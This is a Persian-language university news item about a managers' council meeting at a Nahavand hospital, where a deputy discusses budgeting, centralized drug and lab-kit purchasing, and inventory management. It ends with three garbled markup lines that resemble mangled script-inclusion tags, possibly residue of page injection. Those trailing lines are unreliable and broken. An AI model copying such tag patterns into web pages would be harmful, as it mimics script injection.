مهندس رحیمی معاون توسعه مدیریت  و منابع دانشگاه:الویت دهی سیاستهای وزارت بهداشت درمان و آموزش پزشکی در راستای مدیریت بهینه منابع و مصارف مورد تاکید دانشگاه علوم پزشکی همدان است.

سومین جلسه شورای مدیران با حضور معاون توسعه دانشگاه ؛مدیران بیمارستانها، مدیر امور پشتیبانی و رفاهی؛ مدیر منابع فیزیکی، مدیر و معاون امورمالی معاونت توسعه در بیمارستان شهید قدوسی نهاوند  برگزار شد.

مهندس رحیمی معاون توسعه مدیریت و منابع دانشگاه ضمن توجه  به الویت دهی سیاستهای وزارت متبوع در راستای مدیریت بهینه منابع و مصارف عنوان نمود؛ نظارت صحیح مدیران  بر وضعیت درآمد و هزینه بیمارستانها گامی مهم در تحقق این امر می باشد.

وی همچنین در خصوص لزوم انجام تمهیدات لازم جهت مدیریت شرایط موجود به ویژه در حوزه دارو و ملزومات مصرفی پزشکی عنوان کردند: تاکنون برخی از اقلام داروهای استراتژیک و حیاتی بصورت متمرکز خریداری شده و خرید ۵۰ قلم از کیتهای آزمایشگاهی نیز در دستور کار این معاونت قرار دارد.

مهندس رحیمی در ادامه بر الویت پرداختهای پرسنلی تاکید کرد و افزود:با توجه به گزارشات و تحلیل های مالی مراکز؛ اصلاح فرایندهای هزینه بر سیستم ؛ مدیریت فرایند خرید و انبارش کالا مانند روند ساماندهی کسورات بیمه ای و تعیین تکلیف اقلام‌راکد و مازاد و اسقاط را از اهم برنامه های پیش رو این معاونت باید در نظر بگیریم.

در پایان مدیران بیمارستانها نقطه نظرات خود را در خصوص مسائل و مشکلات  بیان کردند و به دنبال راهکارهای مناسب برای رفع موانع به بحث و تبادل نظر پرداختند.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>